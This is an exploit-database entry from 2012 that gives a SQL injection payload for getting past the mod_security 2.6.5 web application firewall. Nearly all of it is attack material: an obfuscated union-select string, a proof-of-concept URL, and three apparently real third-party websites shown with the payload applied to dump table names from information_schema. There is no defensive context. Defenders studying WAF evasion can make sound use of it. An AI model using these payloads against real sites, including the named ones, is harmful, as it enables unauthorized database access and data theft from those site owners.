mod_security 2.6.5 for Apache 2.2.x & 2.4.1 Released SQL injection bypass



EKU-ID: 1996 CVE: OSVDB-ID:
Author: Phizo Published: 2012-04-23 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


-----------------------------------------------------------------

# Exploit Title: mod_security 2.6.5 SQL injection bypass
# Date: 21/04/2012
# Author: Phizo
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
# Software Link: http://www.modsecurity.org/
# Version: 2.6.5
# Tested on: Windows 7 & Ubuntu 10.04
----------------------------------------------------------------

/** Although I am using union-based injection the concept of the bypass is the same **/


[+] Bypass: +/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#

[+] PoC: http://victim/page.php?id=12+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#

[+] Example sites:
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.indiacctv.com/product.php?id=-18+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,0x5068697a6f,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#
http://www.outside-music.com/news.php?id=-1+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,4,0x5068697a6f,(/*!table_name*/),7,8,9,10,11,12,13+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#
http://www.atitelemetry.com/viewapp.php?id=7'+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,0x5068697a6f,/*!table_name*/,4,5,6,7+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/--+
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------